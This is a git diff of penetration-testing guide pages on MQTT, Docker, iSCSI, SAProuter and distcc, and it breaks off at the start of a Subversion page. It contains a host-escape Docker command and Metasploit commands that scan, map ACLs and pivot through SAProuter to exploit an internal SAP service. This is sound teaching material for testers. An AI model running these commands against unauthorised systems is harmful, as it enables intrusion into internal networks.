-![](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) +![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) -The first field of the fixed header represents the type of the MQTT Packet. All packet types are listed in table 01.Table 01: MQTT Packet Types +### Packet Types + +* CONNECT (1): Initiated by the client to request a connection to the server. +* CONNACK (2): The server's acknowledgment of a successful connection. +* PUBLISH (3): Used to send a message from the client to the server or vice versa. +* PUBACK (4): Acknowledgment of a PUBLISH packet. +* PUBREC (5): Part of a message delivery protocol ensuring the message is received. +* PUBREL (6): Further assurance in message delivery, indicating a message release. +* PUBCOMP (7): Final part of the message delivery protocol, indicating completion. +* SUBSCRIBE (8): A client's request to listen for messages from a topic. +* SUBACK (9): The server's acknowledgment of a SUBSCRIBE request. +* UNSUBSCRIBE (10): A client's request to stop receiving messages from a topic. +* UNSUBACK (11): The server's response to an UNSUBSCRIBE request. +* PINGREQ (12): A heartbeat message sent by the client. +* PINGRESP (13): Server's response to the heartbeat message. +* DISCONNECT (14): Initiated by the client to terminate the connection. +* Two values, 0 and 15, are marked as reserved and their use is forbidden. -![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png) ## Shodan diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 1d803909c..18e72664d 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -1,4 +1,3 @@ -# 2375, 2376 Pentesting Docker
@@ -18,15 +17,15 @@ Other ways to support HackTricks: ### What is -The Docker Platform is the industry-leading container platform for continuous, high-velocity innovation, enabling organizations to seamlessly build and share any application — from legacy to what comes next — and securely run them anywhere. +Docker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments. ### Basic docker architecture -* **[containerd](http://containerd.io)** is a runtime for containers that is capable of **managing the entire lifecycle of a container, including the transfer and storage of images, as well as the execution, supervision, and networking of the container**. **Further details about containerd are provided below**. -* The handling of headless containers is facilitated by container-shim, which serves as an intermediary. Specifically, after the initialization of the containers by runc, control is passed to the container-shim. -* **[runc](http://runc.io)** is recognized as a lightweight, universal container runtime that complies with the OCI specification. It is utilized by containerd to initiate and manage containers in accordance with the OCI specifications and represents a rebranded version of libcontainer. -* For the purpose of facilitating communication between containerd and the docker-engine, **[grpc](http://www.grpc.io)** is employed. -* The OCI specification for runtime and images is maintained by **[OCI](https://www.opencontainers.org)**, with current docker versions being compliant with both the OCI image and runtime specifications. +- **[containerd](http://containerd.io)**: This is a **core runtime** for containers, tasked with the comprehensive **management of a container's lifecycle**. This involves handling **image transfer and storage**, in addition to overseeing the **execution, monitoring, and networking** of containers. **More detailed insights** on containerd are **further explored**. +- The **container-shim** plays a critical role as an **intermediary** in the handling of **headless containers**, seamlessly taking over from **runc** after the containers are initialized. +- **[runc](http://runc.io)**: Esteemed for its **lightweight and universal container runtime** capabilities, runc is aligned with the **OCI standard**. It is used by containerd to **start and manage containers** according to the **OCI guidelines**, having evolved from the original **libcontainer**. +- **[grpc](http://www.grpc.io)** is essential for **facilitating communication** between containerd and the **docker-engine**, ensuring **efficient interaction**. +- The **[OCI](https://www.opencontainers.org)** is pivotal in maintaining the **OCI specifications** for runtime and images, with the latest Docker versions being **compliant with both the OCI image and runtime** standards. ### Basic commands @@ -55,9 +54,12 @@ docker system prune -a ### Containerd -Containerd was designed to be used by Docker and Kubernetes as well as any other container platform that wants to **abstract away syscalls or OS specific functionality to run container**s on linux, windows, solaris, or other OSes. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they don’t. Realistically this is impossible but at least that is what we try for. Things like **networking are out of scope for containerd**. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux. +**Containerd** was specifically developed to serve the needs of container platforms like **Docker and Kubernetes**, among others. It aims to **simplify the execution of containers** across various operating systems, including Linux, Windows, Solaris, and more, by abstracting operating system-specific functionality and system calls. The goal of Containerd is to include only the essential features required by its users, striving to omit unnecessary components. However, achieving this goal completely is acknowledged as challenging. + +A key design decision is that **Containerd does not handle networking**. Networking is considered a critical element in distributed systems, with complexities such as Software Defined Networking (SDN) and service discovery that vary significantly from one platform to another. Therefore, Containerd leaves networking aspects to be managed by the platforms it supports. + +While **Docker utilizes Containerd** to run containers, it's important to note that Containerd only supports a subset of Docker's functionalities. Specifically, Containerd lacks the network management capabilities present in Docker and does not support the creation of Docker swarms directly. This distinction highlights Containerd's focused role as a container runtime environment, delegating more specialized functionalities to the platforms it integrates with. -Note then that **Docker uses Containerd, but it only provides a subet of the features that Docker provides**. So for example ContainerD doesn't have Docker's network management features, nor can you use ContainerD alone to create Docker swarms. ```bash #Containerd CLI @@ -77,18 +79,19 @@ ctr container delete ### Podman -An open-source, OCI ([Open Container Initiative](https://github.com/opencontainers)) compliant container engine known as Podman is maintained by Red Hat. It is characterized by several key distinctions from Docker, including its daemonless structure and the support for containers that do not require root access. The primary function of both tools is to manage images and containers. A notable goal of Podman is compatibility with Docker's API, allowing for the use of almost all Docker CLI commands within Podman. +**Podman** is an open-source container engine that adheres to the [Open Container Initiative (OCI) standards](https://github.com/opencontainers), developed and maintained by Red Hat. It stands out from Docker with several distinct features, notably its **daemonless architecture** and support for **rootless containers**, enabling users to run containers without root privileges. -Within the Podman ecosystem, two additional tools, Buildah and Skopeo, are present. Buildah serves as a CLI tool for building container images, while Skopeo is utilized for operations on images like push, pull, or inspect. For further information on these tools and their integration with Podman, [refer to their GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools). +Podman is designed to be compatible with Docker's API, allowing for the use of Docker CLI commands. This compatibility extends to its ecosystem, which includes tools like **Buildah** for building container images and **Skopeo** for image operations such as push, pull, and inspect. More details on these tools can be found on their [GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools). **Key Differences** -The most significant distinction between Docker and Podman lies in their architectural design. Docker operates on a client-server model, necessitating the use of the Docker CLI to interact with a background daemon responsible for image building and container execution, which operates with root privileges. In contrast, Podman employs a daemonless architecture, allowing containers to be executed under the initiating user's privileges without requiring root access. This design ensures that users of Podman can only interact with their own containers, without a shared daemon for CLI communication. +- **Architecture**: Unlike Docker’s client-server model with a background daemon, Podman operates without a daemon. This design means containers run with the privileges of the user who starts them, enhancing security by eliminating the need for root access. + +- **Systemd Integration**: Podman integrates with **systemd** to manage containers, allowing for container management through systemd units. This contrasts with Docker's use of systemd primarily for managing the Docker daemon process. -To accommodate background container operation without a daemon, Podman integrates with **systemd**, enabling container management through systemd units. This integration varies with the Podman version, offering the ability to generate units for both existing and yet-to-be-created containers, as well as facilitating systemd's operation within containers. Unlike Podman, Docker traditionally relies on systemd for daemon process management. - -Another critical difference is in the execution of containers. Podman allows containers to run with the privileges of the initiating user, not under a daemon. This introduces the concept of rootless containers, which can be initiated without root access, offering a significant security advantage by limiting the potential impact of container breaches. Rootless containers ensure that a compromised container's attacker possesses only the privileges of a normal user on the host, preventing the escalation of privileges beyond those of the initiating user and thereby enhancing security. +- **Rootless Containers**: A pivotal feature of Podman is its ability to run containers under the initiating user's privileges. This approach minimizes the risks associated with container breaches by ensuring that attackers gain only the compromised user's privileges, not root access. +Podman's approach offers a secure and flexible alternative to Docker, emphasizing user privilege management and compatibility with existing Docker workflows. {% hint style="info" %} Note that as podam aims to support the same API as docker, you can use the same commands with podman as with docker such as: @@ -168,7 +171,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash #### Curl -Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API. +Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but it's possible to do it with curl. ```bash #List containers @@ -297,7 +300,7 @@ docker cp :/etc/ * You can use the tool [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) to detect **suspicious behaviour in running containers**. * Note in the following chunk how **Falco compiles a kernel module and insert it**. After that, it loads the rules and **start logging suspicious activities**. In this case it has detected 2 privileged containers started, 1 of them with a sensitive mount, and after some seconds it detected how a shell was opened inside one of the containers. -``` +```bash docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco * Setting up /usr/src links from host * Unloading falco-probe, if present @@ -342,7 +345,7 @@ falco-probe found and loaded in dkms You can use auditd to monitor docker. -# References +## References * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc) diff --git a/network-services-pentesting/3260-pentesting-iscsi.md b/network-services-pentesting/3260-pentesting-iscsi.md index 5611b32e6..c443d9640 100644 --- a/network-services-pentesting/3260-pentesting-iscsi.md +++ b/network-services-pentesting/3260-pentesting-iscsi.md @@ -16,6 +16,8 @@ Other ways to support HackTricks: ## Basic Information +From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI): + > In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval. > > The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure. @@ -70,9 +72,11 @@ You may now mount the target as per the instructions in the link. sudo apt-get install open-iscsi ``` +Example from [iscsiadm docs](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm): + First of all you need to **discover the targets** name behind the IP: -``` +```bash iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260 123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe [2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382 @@ -183,7 +187,8 @@ node.conn[0].iscsi.OFMarker = No ## **References** -{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} +* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) +* [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
diff --git a/network-services-pentesting/3299-pentesting-saprouter.md b/network-services-pentesting/3299-pentesting-saprouter.md index e3888fb40..d63aebf58 100644 --- a/network-services-pentesting/3299-pentesting-saprouter.md +++ b/network-services-pentesting/3299-pentesting-saprouter.md @@ -14,330 +14,82 @@ Other ways to support HackTricks:
- -Copy of: [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) - ```text PORT STATE SERVICE VERSION 3299/tcp open saprouter? ``` -# Piercing SAProuter with Metasploit +This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) -Saprouter is basically a reverse proxy for SAP systems, typically sitting between the Internet and internal SAP systems. Its main purpose is to allow controlled access from hosts on the Internet to the internal SAP systems, since it allows for a finer grained control of SAP protocols than a typical firewall. -This means that saprouter usualy ends up being exposed to the Internet, by allowing the inbound TCP port 3299 to the saprouter host on the organization's firewalls. And from the saprouter, at least it should be possible to reach an internal SAP server. This makes it a very interesting target, since it can provide a way into the “high value” network. +## Understanding SAProuter Penetration with Metasploit -The following figure shows a basic network setup, which we will use for the examples: +SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks. -![](https://blog.rapid7.com/content/images/post-images/33923/image1.jpg) +**Scanning and Information Gathering** -First we'll start by performing a SAP service scan of the exposed IP address, using the [`sap_service_discovery`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery) module, in this case, 1.2.3.101. +Initially, a scan is performed to identify if a SAP router is running on a given IP using the **sap_service_discovery** module. This step is crucial for establishing the presence of a SAP router and its open port. ```text msf> use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101 -RHOSTS => 1.2.3.101 msf auxiliary(sap_service_discovery) > run - -[*] [SAP] Beginning service Discovery '1.2.3.101' - -[+] 1.2.3.101:3299 - SAP Router OPEN -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed ``` -The scan shows us that the host is running a SAP router on the expected port TCP 3299. We can now dig deeper, and attempt to obtain some information from the saprouter. If it has been misconfigured, and often they are, it may be possible to obtain internal information, such as connections established through the saprouter to internal hosts. For this purpose we use the [`sap_router_info_request`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) module: +Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details. ```text msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101 -RHOSTS => 1.2.3.101 msf auxiliary(sap_router_info_request) > run - -[+] 1.2.3.101:3299 - Connected to saprouter -[+] 1.2.3.101:3299 - Sending ROUTER_ADM packet info request -[+] 1.2.3.101:3299 - Got INFO response -[+] Working directory : /opt/sap -[+] Routtab : ./saprouttab - -[SAP] SAProuter Connection Table for 1.2.3.101 -=================================================== - - Source Destination Service - ------ ----------- ------- - 1.2.3.12 192.168.1.18 3200 - - -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed ``` -So, from the output we see that someone on the Internet \(1.2.3.12\) is connected to an internal host \(192.168.1.18\) on port 3200. Port 3200 is a common SAP port for the DIAG protocol \(that's where the SAP GUI application connects to SAP servers\). We also obtain information about the internal IP addressing scheme, they're quite surely using at least the 192.168.1.0/24 network, or some subnet in that network. +**Enumerating Internal Services** -**Enumerating internal hosts and services** - -With this information, we are now able to start scanning the internal network. Since saprouter works like a proxy, we will attempt to connect to it and request connections to internal hosts and ports, and see the replies from saprouter. This may gives more insight into the internal hosts, services and ACLs, depending on the configuration of the saprouter. We'll be using the [`sap_router_portscanner`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) module for this purpose. - -The module connects to the saprouter and requests connections to other hosts \(defined in the TARGETS option\) in specific TCP ports. It then analyses the replies, and understands whether the requested connection is possible or not. This module provides a few options that can used: - -```text -Basic options: - Name Current Setting Required Description - ---- --------------- -------- ----------- - CONCURRENCY 10 yes The number of concurrent ports to check per host - INSTANCES 00-99 no SAP instance numbers to scan (NN in PORTS definition) - MODE SAP_PROTO yes Connection Mode: SAP_PROTO or TCP (accepted: SAP_PROTO, TCP) - PORTS 32NN yes Ports to scan (e.g. 3200-3299,5NN13) - RESOLVE local yes Where to resolve TARGETS (accepted: remote, local) - RHOST yes SAPRouter address - RPORT 3299 yes SAPRouter TCP port - TARGETS yes Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed. -``` - -At the very least you'll have to set the saprouter's IP address, in the example case, 1.2.3.101. Then, set TARGETS to the internal network addresses you'd like to scan, and finally set PORTS with the TCP ports to scan. - -The module provides also an INSTANCES option that allows simplifying the definition of the PORTS option. SAP installations support multiple instances, providing similar services, so each instance has assigned TCP ports. For example, SAP instance 00 will have the SAP dispatcher service \(where SAP GUI connects to\) on port 3200 and instance 01 on port 3201. The PORTS option supports a “wildcard” which is “NN” that will be replaced with the instance number, hence scanning ports for all the defined instances. So, if we want to scan instances from 00 to 50, we can define the INSTANCES and PORTS variables this way: +With obtained internal network insights, the **sap_router_portscanner** module is used to probe internal hosts and services through the SAProuter, allowing a deeper understanding of internal networks and service configurations. ```text msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50 -INSTANCES => 00-01 msf auxiliary(sap_router_portscanner) > set PORTS 32NN -PORTS => 32NN ``` -With this setting the module will scan ports in range 3200 to 3250. +This module's flexibility in targeting specific SAP instances and ports makes it an effective tool for detailed internal network exploration. -In the source of the module you have information regarding the common default ports on SAP systems, which we will now be using for scanning: +**Advanced Enumeration and ACL Mapping** -```text -msf > use auxiliary/scanner/sap/sap_router_portscanner -msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_router_portscanner -msf auxiliary(sap_router_portscanner) > set RHOST 1.2.3.101 -RHOST => 1.2.3.101 -msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.18 -TARGETS => 192.168.1.18 -msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01 -INSTANCES => 00-01 -msf auxiliary(sap_router_portscanner) > set PORTS 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN -PORTS => 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning 192.168.1.18 -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.18 3201 closed SAP Dispatcher sapdp01 - 192.168.1.18 3200 open SAP Dispatcher sapdp00 - 192.168.1.18 50013 open SAP StartService [SOAP] sapctrl00 - -[*] Auxiliary module execution completed -``` - -We can try to understand why some connections are not allowed through the saprouter by using the VERBOSE option. When VERBOSE is set to true we are able to see the response from the saprouter, and map the defined ACL. - -We will now scan the 192.168.1.18 and the 192.168.1.1 hosts, but only on port 3200, to see if we can connect to both SAP dispatchers: - -```text -msf auxiliary(sap_router_portscanner) > set VERBOSE true -VERBOSE => true -msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.1,192.168.1.18 -TARGETS => 192.168.1.1,192.168.1.18 -msf auxiliary(sap_router_portscanner) > set PORTS 32NN -PORTS => 32NN -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning 192.168.1.18 -[+] 192.168.1.18:3200 - TCP OPEN -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.18 3200 open SAP Dispatcher sapdp00 - -[*] Scanning 192.168.1.1 -[-] 192.168.1.1:3200 - blocked by ACL -[!] Warning: Service info could be inaccurate -[*] Auxiliary module execution completed -``` - -As you can see, we now also know that we cannot connect to other host on port 3200, since it is blocked by the ACL defined on the saprouter. - -**Mapping the ACLs** - -An interesting thing about the saprouter, is that it supports two types of connections: - -* Native – These connections are simply TCP connections; -* SAP protocol – These are TCP connections with a twist, the protocol states that all messages are started with 4 bytes stating the length of the following content. - -The SAP protocol is specific to saprouter, and is what the SAP GUI uses to connect to the SAP DIAG port through the saprouter. The native protocol is used for allowing other types of connections to pass through saprouter. - -This module allows for specifying which type of connection to test during the scan in the MODE option. The default is the SAP protocol, which is the most probable to be used in production. However, it is not uncommon to find other services allowed through the saprouter, where the ACL will allow native \(TCP\) connections through. - -We can set the MODE to TCP in order to assess whether this type of connections are allowed. We will now scan the internal hosts, both on port 3200 \(SAP DIAG\) and 80 \(HTTP\), with VERBOSE set to true, on both instances 00 and 01 and see what happens: +Further scanning can reveal how Access Control Lists (ACLs) are configured on the SAProuter, detailing which connections are allowed or blocked. This information is pivotal in understanding security policies and potential vulnerabilities. ```text msf auxiliary(sap_router_portscanner) > set MODE TCP -MODE => TCP - msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN -PORTS => 80,32NN -msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01 -INSTANCES => 00-01 -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning 192.168.1.18 -[+] 192.168.1.18:80 - TCP OPEN -[-] 192.168.1.18:3200 - blocked by ACL -[+] 192.168.1.18:3201 - TCP OPEN -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.18 80 open - 192.168.1.18 3201 open SAP Dispatcher sapdp01 - -[*] Scanning 192.168.1.1 -[-] 192.168.1.1:3200 - blocked by ACL -[+] 192.168.1.1:3201 - TCP OPEN -[+] 192.168.1.1:80 - TCP OPEN -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.1 3201 open SAP Dispatcher sapdp01 - 192.168.1.1 80 open - -[*] Auxiliary module execution completed ``` -From the output and the previous information we now know that the ACL is something like this: +**Blind Enumeration of Internal Hosts** -* Allow TCP connections from any host to 192.168.1.1 to port 80 -* Allow TCP connections from any host to 192.168.1.18 to port 80 -* Allow TCP connections from any host to 192.168.1.1 to port 3201 -* Allow TCP connections from any host to 192.168.1.18 to port 3201 -* Allow SAP connections from any host to 192.168.1.18 to port 3200 +In scenarios where direct information from the SAProuter is limited, techniques like blind enumeration can be applied. This approach attempts to guess and verify the existence of internal hostnames, revealing potential targets without direct IP addresses. -**Blind enumeration of internal hosts** +**Leveraging Information for Penetration Testing** -If you recall, we started by obtaining information from the saprouter which allowed us to know the IP address on an internal host, and we went on from there. But what if the saprouter doesn't provide us with that information? - -One option is to just start scanning private address spaces, and see what happens. The other is to blindly enumerate hosts by hostname. - -Saprouters are able to resolve hostnames we request it to connect to. Saprouter is also kind enough to let us know what are the errors when it fails to connect \(you can actually see the raw responses by uncommenting line 242 on the module source\). - -With this feature we are able to enumerate internal hosts by hostname, and try to go directly for the gold! - -For this, we need to set the RESOLVE option to “remote”. In this case, the module will request connection to the TARGETS defined, without resolving them locally, and we can try to guess the internal hosts, and eventually connect to them without ever knowing their IP addresses. - -Important things to remember when blindly enumerating hosts: - -* Set VERBOSE to true; -* We'll get more information from saprouter if MODE is set to SAP\_PROTO; -* It is enough to set only one port to scan, since we're only interested at this point in the information sent by the saprouter \(try 3200\); -* Results will vary depending on the configured ACL. Unfortunately blocked connections won't give us much info. - -In this example we'll try the hostnames sap, sapsrv and sapsrv2. +Having mapped the network and identified accessible services, penetration testers can utilize Metasploit's proxy capabilities to pivot through the SAProuter for further exploration and exploitation of internal SAP services. ```text -msf auxiliary(sap_router_portscanner) > set RESOLVE remote -RESOLVE => remote -msf auxiliary(sap_router_portscanner) > set MODE SAP_PROTO -MODE => SAP_PROTO -msf auxiliary(sap_router_portscanner) > set VERBOSE true -VERBOSE => true -msf auxiliary(sap_router_portscanner) > set TARGETS sap,sapsrv,sapsrv2 -TARGETS => sap,sapsrv,sapsrv2 -msf auxiliary(sap_router_portscanner) > set PORTS 3200 -PORTS => 3200 -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning sap -[-] sap:3200 - unknown host -[!] Warning: Service info could be inaccurate -[*] Scanning sapsrv -[-] sapsrv:3200 - host unreachable -[!] Warning: Service info could be inaccurate -[*] Scanning sapsrv2 -[+] sapsrv2:3200 - TCP OPEN -[!] Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - sapsrv2 3200 open SAP Dispatcher sapdp00 - -[*] Auxiliary module execution completed -``` - -From the output we see that the host “sap” does not exist, but that host sapsrv does, although it is unreachable, and sapsrv2 exists and we can connect to port 3200. - -This technique can also be used to try to find other hosts on the network, not SAP related, just try using common hostnames, like smtp, exchange, pdc, bdc, fileshare, intranet, or what other nice hostnames you might have on your bag of tricks - -**The last mile** - -Now that we have obtained all this information, we know the internal hosts available, what services are allowed, and what protocols we can use to pierce the saprouter, we can actually connect to internal servers, and proceed with our pentest. - -Metasploit provides us with an awesome way to saprouter as a proxy, using the Proxies option, thanks to Dave Hartley \([@nmonkee](http://twitter.com/nmonkee)\). - -So at this point, we want to start gathering information on the internal sap server we have discovered in host 192.168.1.18. As an example, we'll be using the module [`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) which exploits CVE-2013-3319 and give us details on the OS the server is running on by querying the SAP Host Control service on port 1128 via an unauthenticated SOAP request. We'll be pivoting through the saprouter, using the proxy support in metasploit: - -![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg) - -```text -msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299 -Proxies => sapni:1.2.3.101:3299 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18 -RHOSTS => 192.168.1.18 msf auxiliary(sap_hostctrl_getcomputersystem) > run - -[+] 192.168.1.18:1128 - Information retrieved successfully -[*] 192.168.1.18:1128 - Response stored in /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_386124.xml (XML) and /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_186948.txt (TXT) -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed ``` -If all went well, you'll have a nice output of the module in the loot containing interesting internal information from the target SAP host \(such as internal usernames you can then try to brute force \). - -Pivoting can \(and should!\) be used to run other modules against internal hosts, not only SAP systems! - **Conclusion** -We've seen how it is possible to exploit weak saprouter configurations that can allow access to internal hosts all the way from the Internet, all this using only metasploit's support for pentesting SAP systems. +This approach underscores the importance of secure SAProuter configurations and highlights the potential for accessing internal networks through targeted penetration testing. Properly securing SAP routers and understanding their role in network security architecture is crucial for protecting against unauthorized access. -I hope this article can help shed light on both the risks associated with saprouter deployments, as well as SAP security in general. +For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db). -**References** -* [http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/](http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/) -* \[[http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nun ez Di Croce - SAProuter .pdf\]\([http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nunez Di Croce - SAProuter .pdf\) -* [http://scn.sap.com/docs/DOC-17124](http://scn.sap.com/docs/DOC-17124) -* [http://help.sap.com/saphelp\_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/f rameset.htm](http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm) -* [http://help.sap.com/saphelp\_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767 /content.htm](http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm) -* [http://labs.integrity.pt/advisories/cve-2013-3319/](http://labs.integrity.pt/advisories/cve-2013-3319/) -* [SAP Service Discovery \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery) -* [SAPRouter Admin Request \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) -* [CVE-2013-3319 SAP Host Agent Information Disclosure \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) -* [SAPRouter Port Scanner \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) +## **References** -# Shodan +* [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/) + +## Shodan * `port:3299 !HTTP Network packet too big` diff --git a/network-services-pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md index 52169c4d5..3984eba99 100644 --- a/network-services-pentesting/3632-pentesting-distcc.md +++ b/network-services-pentesting/3632-pentesting-distcc.md @@ -17,7 +17,7 @@ Other ways to support HackTricks: # Basic Information -Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed +**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code. **Default port:** 3632 diff --git a/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 5912010ce..41c5b0f7d 100644 --- a/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ 